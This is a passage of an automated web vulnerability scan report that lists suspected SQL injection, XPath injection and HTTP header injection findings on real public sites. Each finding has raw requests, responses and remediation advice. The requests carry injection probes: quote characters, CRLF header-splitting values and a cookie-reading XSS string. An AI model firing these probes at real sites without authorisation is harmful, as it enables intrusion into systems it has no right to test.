The saldr parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the saldr parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1'&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:40:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
xcfyn7W6kDqWYQ&client=ca-pub-4537085524273794&adurl=http://app.insightgrit.com/Visit.php%3Fvt%3DO%26rid%3D84196991143186%26chid%3D320%26schid%3D320492%26c%3D84196%26kw%3Ddomain%2520name%2520system%2520error%26adid%3D5757498299%26cid%3D9496%26lsd%3DGoogle-Network%26_kk%3Ddomain%2520name%2520system%2520error%26_kt%3Df00942f2-b211-4990-ac15-86efd643f595" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onm
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1''&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:40:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.17. http://news.google.com/news/story [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.google.com
Path:   /news/story

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/story HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q="

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=EYtHjiYP5kOB7gTcEAAy1Jtw9LIAHRdjqdU_4_7j9uSCko6Gh0azHUYusGbifXTXcYEqyKocrdBs80Bh6bDWIuEn2OfLiIDq4LoIRKO8fcCXiyHs_5xz2mVk7MM0B_ky;Domain=.google.com;Path=/;Expires=Wed, 03-Aug-2011 15:37:34 GMT;HttpOnly
Date: Tue, 01 Feb 2011 15:37:34 GMT
Expires: Tue, 01 Feb 2011 15:37:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
4J2H2Wkg4gnMQE_p195fMUAgpcYIJDx3t6nec_c3lUnCVmWZbc_9ZeNoniVbpA7w12s9pN6LyGsevEpyJYhJ6I5oVGvf9uODE4dFv4Sa56mF-bgTriJon7LM5OQPrJx-Ba3v1gkLXwM0lS1nMnwUXa_mPtsJLog92IUPKygEGcxUdj8_KZ6pSr36M6ZnpubYu4k0GbM_wORA-3s3PCXoiAukf4CILbvlAfvTcSoBZtxbTjMbbvbHKfXqbzI-_5gpc5CxOpFcoscw3IsBQvavUYkgZvE-UL059BwpBY0MNrIlUr4WHVPXpPkAHOzQRuShQ-BMYPRGLnRabtOxD-XDuZx_Y0ZyVD61nhZTHjpTTBxw95QaJ1yZDUKfVal2_dEB7PO59pYfTUWMtZUgVAGRviG
...[SNIP]...

1.18. http://offers.lendingtree.com/splitter/splitter.ashx [800Num parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://offers.lendingtree.com
Path:   /splitter/splitter.ashx

Issue detail

The 800Num parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 800Num parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2 HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 15:38:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3rvf2azbtvqvcurys2gfk355; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Nickname: Shaggy
X-Powered-By: ASP.NET
Content-Length: 30033
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...


       if(promoID == null) return;

Tree.API.LendingTree.getPromoInfo(promoID, function(promoInfo) {


if (promoInfo == null || promoInfo.Status != "1") { // invalid promo resort to default

Tree.API.LendingTree.getPromoInfo(defaultPromoID, function(promoInfo) {

prepopPromoObject(promoInfo)

...[SNIP]...

Request 2

GET /splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731''&adtype=2 HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 15:38:25 GMT
Location: http://offers.lendingtree.com/splitter/splitter.ashx?id=displaysfrefidirect&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731''&adtype=2
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Nickname: Shaggy
X-Powered-By: ASP.NET
Content-Length: 290
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://offers.lendingtree.com/splitter/splitter.ashx?id=displaysfrefidirect&amp;promo=00313&amp;source=4666360&amp;es
...[SNIP]...

1.19. http://www.google.com/finance [hl\x3den\x26tab\x3dwe\x22 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.google.com
Path:   /finance

Issue detail

The hl\x3den\x26tab\x3dwe\x22 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl\x3den\x26tab\x3dwe\x22 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /finance?hl\x3den\x26tab\x3dwe\x22' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 1

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Wed, 02 Feb 2011 15:53:47 GMT
Expires: Wed, 02 Feb 2011 15:53:47 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
<div class=snippet>By Ryan Vlastelica NEW YORK, Feb 2 (Reuters) - US stocks were little changed on Wednesday as a strong reading on the labor market failed to extend gains a day after the Dow and S&amp;P reached their highest close in about 2-1/2 years.</div>
...[SNIP]...

Request 2

GET /finance?hl\x3den\x26tab\x3dwe\x22'' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 2

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Wed, 02 Feb 2011 15:53:47 GMT
Expires: Wed, 02 Feb 2011 15:53:47 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

1.20. http://www.hotelclub.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 13176
Content-Type: text/html; Charset=windows-1252
Expires: Wed, 02 Feb 2011 15:58:39 GMT
Cache-Control: private
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:59:40 GMT
Connection: close
Set-Cookie: ltvisit=%7BA1C36645%2DB155%2D4858%2DA1E8%2D701A315C8806%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQCDQDRTT=GNEIPJKDPDKCKEAIKMCFGKKD; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273445525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 13176


<html>
<head>


<title>Under Maintenance</title>
<meta name=robots content=noindex,nofollow>


<link rel="stylesheet" id="main-css" href="/Private/styles/styles.css" type="text/css">

...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 228109
Content-Type: text/html; Charset=windows-1252
Expires: Tue, 01 Feb 2011 15:59:36 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Date: Wed, 02 Feb 2011 15:59:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E1; path=/
Set-Cookie: AffiliateLogID=%2D2078738119; expires=Fri, 04-Mar-2011 13:00:00 GMT; path=/
Set-Cookie: ltvisit=%7BD4EBE398%2DB8FE%2D4B7D%2D9079%2D5C17098A1DC7%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACTBCTST=NNLDPPJDCLHLLKGJCOELHMHF; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273a45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 228109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

2. XPath injection
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://entertainment.msn.com/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /news'/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53147
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=c371288793344ba29799f891089f3489; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:35:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

2.2. http://entertainment.msn.com/video/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /video'/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53147
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=c0b4ae52bcfc4e1eb9d3383e05f466fb; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:33:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

3. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f134%0d%0a61816c1ba6c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f134%0d%0a61816c1ba6c/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f134
61816c1ba6c
/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http: //ad.thewheelof.com/clk
Date: Wed, 02 Feb 2011 15:33:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15468%0d%0a61dc607be51 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15468%0d%0a61dc607be51/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
